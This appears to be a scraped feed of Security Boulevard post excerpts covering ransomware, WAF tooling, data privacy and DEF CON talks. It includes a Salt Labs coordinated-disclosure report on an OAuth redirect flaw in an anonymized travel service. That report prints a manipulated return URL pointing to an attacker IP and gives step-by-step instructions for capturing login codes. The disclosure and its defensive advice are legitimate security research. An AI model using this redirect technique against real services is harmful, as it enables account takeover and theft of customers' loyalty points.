The Halliburton Cyberattack: A $35M Wake-Up Call
The post The Halliburton Cyberattack: A $35M Wake-Up Call appeared first on Votiro.
The post The Halliburton Cyberattack: A $35M Wake-Up Call appeared first on Security Boulevard.
The post The Halliburton Cyberattack: A $35M Wake-Up Call appeared first on Votiro.
The post The Halliburton Cyberattack: A $35M Wake-Up Call appeared first on Security Boulevard.
Discover how to effectively manage and optimize AI tokens for better performance and cost efficiency. This guide covers everything from basic concepts to advanced implementations, including context window management, coding assistant development, and practical cost optimization strategies.
The post Complete Guide to AI Tokens: Understanding, Optimization, and Cost Management appeared first on Security Boulevard.
Authors/Presenters: Grey Fox
Our sincere appreciation to DEF CON, and the Authors/Presenters for publishing their erudite DEF CON 32 content. Originating from the conference’s events located at the Las Vegas Convention Center; and via the organizations YouTube channel.
The post DEF CON 32 – Travel Better Expedient Digital Defense appeared first on Security Boulevard.
Rule Writer is your go-to AI-powered assistant for tackling the messy, time-consuming world of WAF rule creation and management. It’s not just a tool—it’s like having an extra teammate who never sleeps and always knows exactly what to do.
The Truth About WAF RulesHere’s the thing about WAF rules: most teams barely touch them. It’s not because they don’t care—it’s because they don’t have time. Many teams rely on open-source rule sets, turn on just enough to pass a compliance check, and then… well, forget about them. WAF rules often end up as a "set it and forget it" kind of situation.
When WAF Rules Get Attention, It’s UrgentBut when WAF rules do need updating, it’s usually because something’s on fire. Maybe your app is under attack, or a false positive is blocking critical traffic. It could even be a major partner unable to connect to your app. In these moments, speed is everything. You can’t afford to spend weeks crafting the perfect rule. You need a fix, and you need it now.
Enter Rule WriterRule Writer changes the game. It’s an AI assistant that helps you design, test, and deploy WAF rules faster than ever. Here’s how it works:
With Rule Writer, security teams can finally move at the speed of modern threats without getting bogged down in the details. No more scrambling to update rules during an incident. No more worrying about whether your WAF is doing its job. Rule Writer handles the hard stuff so you can focus on what really matters: keeping your apps secure and your team sane.
Ready to see Rule Writer in action? Give it a try and experience the difference for yourself.
The post write waf rules faster with WAF Rule Writer | Impart Security appeared first on Security Boulevard.
Nisos
Identifying and Preventing Employment Fraud
Remote work is driving an increase in employment fraud complexity and frequency...
The post Identifying and Preventing Employment Fraud appeared first on Nisos by Nisos
The post Identifying and Preventing Employment Fraud appeared first on Security Boulevard.
A global survey of 2,547 IT and cybersecurity practitioners finds 88% work for organizations that experienced one or more ransomware attacks in the past three months to more than 12 months, with well over half (58%) needing to, as a result, shut down operations and 40% reporting a significant loss of revenues. Conducted by the..
The post Survey Surfaces Extent of Financial Damage Caused by Ransomware Scourge appeared first on Security Boulevard.
Account takeover of a third-party service provider may put millions of airline users worldwide at risk.
SummarySalt Labs has identified an account takeover vulnerability in a popular online top-tier travel service for hotel and car rentals. The service is integrated into dozens of commercial airline online services and allows airline users to add hotel bookings to their airline itinerary.
By exploiting this flaw, attackers can gain unauthorized access to any user’s account within the system, effectively allowing them to impersonate the victim and perform an array of actions on their behalf — including booking hotels and car rentals using the victim's airline loyalty points, canceling or editing booking information, and more.
This vulnerability can be exploited through a malicious link bypassing the travel service's security checks. Attackers may distribute this link via email, text messages, or on attacker-controlled websites to lure victims. Once the link is clicked and following a successful authentication to the official airline service, the attacker gains full access to the user’s account within the travel system.
This vulnerability might have put millions of online airline users at risk. Following our research and coordinated disclosure process, the online travel service has identified, confirmed, and addressed the risks, which are now confirmed to have been mitigated.
DisclaimerFollowing the Salt Labs team’s coordinated disclosure, this report will be completely anonymized in order to comply with the request for anonymity by the world-class travel company referenced.
MotivationThe world of online services is amazing. It wouldn’t be an understatement to say that it alone has changed the lives of millions of people. Today, instead of walking into a grocery store, you can simply purchase everything you need through a mobile application, and in just a short time, it will arrive at your doorstep.
The benefits of online services seem to be never-ending; however, what must be taken into consideration are the Application Programming Interface (APIs) associated with such services. APIs are, in simple terms, the language in which these online services speak. If you look underneath your mobile application hood, you will see that this is exactly what is happening behind the scenes.
While this amazing functionality provides obvious value to online users, the potential does not actually stop there.You see, these services can be trivially used by the end-consumer — but they can also be used by other services.
Think about it for a second: a grocery store offering a delivery service. Did the grocery store get into the delivery business? Well, not necessarily. In fact, in most cases, the answer is no. But if you’re a grocery store, why let that put you down? If they can't offer a delivery service themselves, they can always use a third-party delivery service. All you need to do is connect their online store to an online delivery service and let this service handle all the logistics — they just need to provide the details and boom — they now have an online grocery store that provides delivery service. The nicest thing about it is that their customers are completely unaware of the steps taken to establish the service — for all they know, they are interacting only with your online store, nothing else.
And so, a huge API ecosystem develops right underneath the noses of customers. Services using other services that are again using other services, and so on.
Of course, this is amazing. It provides better services for online customers and a wide range of flexibility options to online businesses in almost any domain. However, it also has a less obvious side effect.
Whenever a service-to-service interaction is taking place, some kind of trust must be shared between both parties. In the case of an online grocery store, the delivery details, phone number, and perhaps even the customer's credit card must be shared with the delivery service provider. From that point on, the grocery store cannot protect this data anymore, as it's out of their hands — and the users now have to rely on the security of a third-party provider, which, as mentioned, they usually are not even aware of.
This, of course, presents a new opportunity for attackers. From their perspective, the attack surface available to them just multiplied, providing more opportunities to find security issues.
Imagine that the online grocery store does an amazing job at protecting its online customers, making it very difficult for an attacker to break into the system and steal private customer data. However, now, the attacker can actually choose to attack the delivery service rather than the store itself, as it is a different company; there is a chance that their security controls are not as strict as that of the online store, and if successful, the goal is still achieved as the delivery service now holds all the necessary private information.
Such an attack is called an “API Supply Chain Attack,” in which an attacker chooses to attack a weaker link in the service’s API ecosystem.
While security professionals have long-known supply-chain attacks, they are far less known to the general public, and we have seen very few actual cases of API supply-chain attacks or technical vulnerabilities published.
It’s also important to mention that many governance security controls and policies, such as GDPR, HIPPA, and many others, have been built and implemented throughout the years to address this risk. While they’ve definitely improved the situation and reduced the risk, the problem doesn’t just go away.
This is why we decided to tackle this issue: to attempt to find a real-world API supply chain attack that could impact millions of online users. We hope this will shed some more light on this super important topic and raise more awareness of it.
Choosing a TargetSo, we set out on a mission to find a real-world API supply chain attack, but where should we start looking for it?
We started looking for travel-related online services that provide a third-party integration. Our goal was to find a popular service that shares considerable trust and valuable information from the calling service.
After a lot of digging, we found a service that could have been what we were looking for.
As mentioned before, we chose to anonymize the service in this article and will henceforth address it as “Acme Travel.” It provides online hotel and car rental booking solutions.
After some more searching, we discovered that this service is indeed a popular vendor for many commercial airline services, as well as other retail services. Moreover, integration into this service allows users to book hotels and car rentals using their airline loyalty points, which means this information is trusted and shared between the airline and the Acme Travel service.
Amazing, this is just what we were looking for. Obviously, breaking into an airline in an attempt to steal loyalty points would be a very hard task for any attacker, but perhaps this new service, or the connection point between these services, might change this equation.
Equipped with motivation and a potential target, we now had everything we needed to start our research. All we needed to do was find a security vulnerability. Let the games begin.
The PlanFrom a technical perspective, the best way to achieve our goal was to find an account-takeover scenario on Acme-Travel services. This would allow us to log in directly to the service as any user and act on their behalf — including, of course, issuing hotel and car rental bookings using the user's airline loyalty points. To achieve that, we first had to better understand the airline service, the Acme-Travel service, and their connection.
Normal ProcessLet’s begin by describing the typical login process on an airline website that chose to use the Acme travel service. We have obviously looked into many online airline services. However, for the sake of this research, we will mention a fabricated airline that follows the exact same technical flow as Salt Airlines.
At some point, after issuing the initial airline booking, users of Salt Airlines’ main application — www.saltairlines.sec — may choose to add an additional hotel or car-rental booking to their trip. If they choose to do this, they will be redirected to the Acme Travel service integration acme.saltairlines.sec. Note that from a user's perspective, this is all happening transparently, it's not trivial to even notice that they are now in a third-party application and no longer on the original Salt Airlines site, as the web design is customized, and the user experience is completely aligned with the original airline service.
Once the user is redirected to the Acme-Travel integrated site, they can initiate a login using their airline credentials. At this point, the Acme-Travel backend will generate a link and redirect the user back to the main airline website to perform authentication via an authentication technology called OAuth. Once a successful login takes place, this process retrieves the user’s account information from the airline site, including his/her personal data and loyalty point status.
After completing these steps, the user is redirected back into acme.saltairlines.sec, where they can now access and use their airline loyalty points to book hotels and car rentals at their leisure.
Here is a technical breakdown of the requests that are generated as part of this process:
Now that we clearly understand how the services work and interact with each other, it's time to try to find security issues within the process.
By closely examining the authentication flow, we realized that the tr_returnUrl parameter found in the initial login request actually determines where the tr_code and tr_id parameters will be sent to after a successful authentication is complete.
As a quick reminder, the tr_code and tr_id parameters are equivalent to the user credentials since an attacker who holds them can log in to the Acme Travel service without any further need for authentication.
https://acme.saltairlines.sec/start?tr_returnUrl=https%3A%2F%2Facme.saltairlines.sec%2F&language=en&tr_backend_session=example
In the normal flow, the tr_code and tr_id parameters are sent to the Acme-Travel service, however by manipulating the tr_returnUrl parameter, we attempted to redirect the tr_code and tr_id to a server under our control. If successful this would allow us to capture these credentials, enabling unauthorized access and account hijacking.
And it seems it worked! When sending a request with a manipulated tr_returnUrl parameter that points to a server we control, we can see that, indeed, a request from the client is received, which contains both the tr_code and tr_id parameters.
This basically allows us to take over an airline user's account once he successfully authenticates to the airline website.
In order to conduct our attack, the following steps are taken:
In our use case, the original tr_returnUrl is:
tr_returnUrl=https%3A%2F%2Facme.saltairlines.sec%2F&
tr_returnUrl=http://142.93.164.25/evil
6. After the victim successfully authenticates to the official airline page, the code and id values are sent to the attacker-controlled URL. In this case, the request would look like:
https://acme.saltairlines.sec/start?tr_returnUrl=http://142.93.164.25/evil&language=en&tr_backend_session=c077f47e-c60e-45ec-96d7-e512812fa638
7 . The attacker can then use these credentials to obtain a valid session token by making a request to the following endpoint:
https://acme.saltairlines.sec/SessionEndpoint
8. With this session token, the attacker can log into the system as the victim and perform actions on their behalf, including, of course, booking hotels and car rentals using nothing but the victim’s airline loyalty points.
9. Attacker goes on a free vacation :)
Notes:If the victim is already logged in to www.saltairlines.sec, they will be redirected to the attacker’s server with the code and id in a single click, without requiring an additional login.
Since the manipulated link uses a legitimate customer domain (with manipulation occurring only at the parameter level rather than the domain level), this makes the attack difficult to detect through standard domain inspection or blocklist/allowlist methods.
ConclusionThis discovered vulnerability enables attackers to take over victim accounts with a single click. While the takeover occurs within the Acme-integrated service, it provides attackers full access to the user’s personally identifiable information (PII) from the main Salt Airlines account, including all mileage and rewards data. Beyond mere data exposure, attackers can perform actions on behalf of the user, such as creating orders or modifying account details. This critical risk highlights the vulnerabilities in third-party integrations and the importance of stringent security protocols to protect users from unauthorized account access and manipulation.
What can I do?As always, it’s important for us to provide readers who reached this point in our publication with some recommendations as to what they can do in order to prevent being attacked with this and similar API supply chain attack techniques.
These recommendations, however, vary depending on what role you play in this API ecosystem.
Service UsersAs a user of online services, it is always advisable to use caution when receiving links from untrusted sources, even if the links may appear utterly legitimate at first glance, and even if they lead to legitimate and trusted web sites.
Service ConsumersIf your service is consuming or using a third-party service, you should pay special attention to the integration point between these services as well as to the trust relationship between the services and verify that everything meets your desired security standards and that the information shared between the services is mandatory.
It is also advisable to perform extra security checks, as well as penetration testing methodologies depending on the type and sensitivity of the relationship between the services.
Service ProducersAs a service producer, it is super important to make sure your service and its integration points are well secure. Special attention should be put into the design and implementation steps to ensure security standards are met and correctly implemented. Additionally, it is recommended to consider using a third-party vendor that will be able to automatically identify any existing posture gaps, and anomalous traffic as it occurs to support a more robust layered defense approach.
The post API Supply Chain Attacks — The Sky’s the Limit appeared first on Security Boulevard.
Ransomware attacks surged to a record high in December 2024, with 574 incidents reported, according to an NCC Group report. FunkSec, a newly identified group combining hacktivism and cybercrime, accounted for over 100 attacks (18% of the total), making it the most active group that month, ahead of Cl0p, Akira and RansomHub. The industrial sector..
The post Ransomware Threats, Led by FunkSec, Rise to New Heights appeared first on Security Boulevard.
Cybercriminals are coming for your loyalty points and messing with dynamic pricing—don’t let them win. Learn how to stay ahead and keep your customers protected.
The post Protecting Airlines: How to Stop Scraping and Loyalty Fraud appeared first on Security Boulevard.
Explore DDoS mitigation, from choosing providers to understanding network capacity, latency, SLAs, and how solutions like DataDome can protect your assets
The post How to Mitigate a DDoS Attack: A Comprehensive Guide for Businesses appeared first on Security Boulevard.
A report published by Google Cloud found nearly half (46%) of the observed security alerts involved a service account that was overprivileged.
The post Google Issues Cloud Security Wake-Up Call as Threats Evolve appeared first on Security Boulevard.
Discover how Sanoma reduced credential stuffing attacks by 99% with DataDome's real-time cyberfraud protection, while enjoying the benefits of easy integration and major time savings.
The post How Sanoma Saves Time & Protects User Accounts from Credential Stuffing Attacks appeared first on Security Boulevard.
The low-altitude economy is becoming an important force to promote economic growth by virtue of its innovative ability and huge development potential. From UAV logistics distribution to urban air traffic, from emergency rescue to aerial photography and mapping, the application scenarios of low-altitude economy have been continuously expanded, and the market scale has been expanding […]
The post Security Risks of Low-altitude Economy appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..
The post Security Risks of Low-altitude Economy appeared first on Security Boulevard.
Organizations today operate in dynamic and fast-paced environments, where multiple cross-functional teams are working together to develop, deploy, and manage infrastructure, cloud services and applications. These teams need digital certificates at nearly every stage for various purposes and at different times. The responsibility of issuing and managing these certificates often falls on the shoulders of […]
The post Certificate Management Self-Service Capabilities to Simplify Access and Boost Efficiency appeared first on Security Boulevard.
As we celebrate Data Privacy Day, Bernard Montel, Tenable’s EMEA Technical Director and Security Strategist, wants to remind us that we live in a digital world and that we need to protect it. With data breaches a daily occurrence, and AI changing the playing field, he urges everyone to “do better.”
Launched in April 2006 by the Council of Europe, Data Protection Day – or Data Privacy Day, as it’s known outside of Europe – is celebrated globally every year on January 28. Back in 2006, around 100 million records were compromised across various breaches in the U.S., according to data collated by Privacy Rights Clearing House. But in 2024, in just one data breach suffered by National Public Data (NPD), approximately 2.9 billion records were allegedly stolen.
Collectively, we have to do better.
The lifeblood of the organizationData is the essence of every company. It’s information about your customers, your employees, your intellectual property, your financial performance and more. Data also fuels innovation in the cloud. However, the volume and complexity in hybrid and multi-cloud environments make it increasingly complex to secure your business’s data.
Externally, data breaches can lead to mistrust and brand damage, as well as to lawsuits, fines and lost business. Internally, they can – and should – trigger increased scrutiny from the board, which will justifiably question the strength of the organization’s security posture.
When AI comes marching inWith data at the heart of everything, AI has completely changed the playing field this Data Privacy Day, adding a further layer of risk when it comes to protecting our information.
Organizations face the complex task of controlling AI deployment usage while also identifying vulnerabilities within AI tools and AI development packages. The adoption of AI increases the volume and variety of cloud data. In tandem, as AI applications become more sophisticated, they require more training data to learn from and function effectively. Thus, protecting cloud data is paramount to maintaining the integrity and security of your business’s AI usage.
Externally, threat actors are also looking to supercharge their activity with AI. It has been well documented how attackers are leveraging AI to write more sophisticated and effective malware for ransomware attacks, as well as to enhance phishing scams and more.
You can’t have privacy without securityTo take advantage of the unique opportunities offered by the cloud and AI, you must address the full spectrum of security responsibilities that accompany collecting, storing, and using data. These responsibilities include automatically and continuously scanning data assets, discovering and monitoring sensitive data, and alerting on any potential risk.
Protecting data in public cloud environments starts with three steps:
Let’s look at how the integration of data security posture management (DSPM) into a cloud native application protection plaform (CNAPP) can give you a comprehensive view of your cloud data and the risks associated with it.
DSPM is a set of ongoing processes and technologies that provides visibility into where sensitive data is stored, who has access to it, and how it's being used across your systems, providing analysis of the overall security posture around data itself, rather than just the infrastructure hosting it.
Meanwhile, CNAPP solutions replace a patchwork of siloed products that often cause more problems than they solve, such as multiple false positives and excessive alerts. Those individual products usually provide only partial coverage and often create overhead and friction with the products they’re supposed to work with. Most importantly, CNAPPs allow businesses to monitor the health of cloud native applications as a whole rather than individually monitoring cloud infrastructure and application security.
When DSPM is integrated into a CNAPP, it empowers the security team to obtain actionable data context that helps the team better prioritize risks and reduce the organization's exposure to customer data breaches and the compromise of AI resources and intellectual property.
How Tenable can helpWith Tenable Cloud Security, you can reduce risk by rapidly exposing and closing priority security gaps caused by misconfigurations, risky entitlements and vulnerabilities – in one powerful CNAPP. With integrated DSPM capabilities, Tenable Cloud Security continuously monitors your multi-cloud environment to discover and classify data types, assign sensitivity levels and prioritize data findings in the context of the entire cloud attack surface.
At Tenable, we help you identify your weaknesses, detect your gaps and close your exposures quickly. This Data Privacy Day, do better by taking action to protect the data that your organization relies upon to function and that you’re trusted to protect, wherever it resides.
Learn more
The post What Makes This “Data Privacy Day” Different? appeared first on Security Boulevard.
The DOJ, which has move aggressively over the past year to find and shut down North Korea's numerous IT worker scams, indicts two U.S. citizens and three others for running a six-year operation the stole more than $866,000 from 10 U.S. companies that thought they were hiring legitimate IT pros.
The post U.S. Shuts Down Another N. Korean IT Worker Scam, Indicting 5 appeared first on Security Boulevard.
In this episode, Paul Asadoorian and Chase Snyder discuss the latest security threats and vulnerabilities affecting network appliances, particularly focusing on Avanti and Fortinet platforms. They explore the increasing risks associated with these devices, the need for improved security standards, and the challenges of risk management and visibility in network security. The conversation emphasizes the […]
The post BTS #44 - Network Appliances: A Growing Concern appeared first on Eclypsium | Supply Chain Security for the Modern Enterprise.
The post BTS #44 – Network Appliances: A Growing Concern appeared first on Security Boulevard.
Most organizations believe they have a solid process for managing vulnerabilities and exposures. Yet attackers continue to exploit vulnerabilities as one of the most common paths to breaches. This isn’t because these organizations use antiquated methods but because they struggle to keep up with all exposures. Security leaders can significantly reduce risk by adopting a …
The post Is Your Vulnerability Management Strategy Doing More Harm than Good? appeared first on Security Boulevard.
Gartner forecasts generative AI will be used in 17% of cyberattacks within the next two years. This is not surprising, given that we already see examples of threat actors using AI for their operations. The initial use case involves leveraging AI to simplify access to an environment.
The post AI-Enhanced Attacks Accelerate the Need for Hybrid, Multi-Cloud Network Security and Observability appeared first on Netography.
The post AI-Enhanced Attacks Accelerate the Need for Hybrid, Multi-Cloud Network Security and Observability appeared first on Security Boulevard.
Author/Presenter: Julia Dewitz-Würzelberger
Our sincere appreciation to DEF CON, and the Authors/Presenters for publishing their erudite DEF CON 32 content. Originating from the conference’s events located at the Las Vegas Convention Center; and via the organizations YouTube channel.
The post DEF CON 32 – Simulating Attacks Against Hydroelectric Power Plants appeared first on Security Boulevard.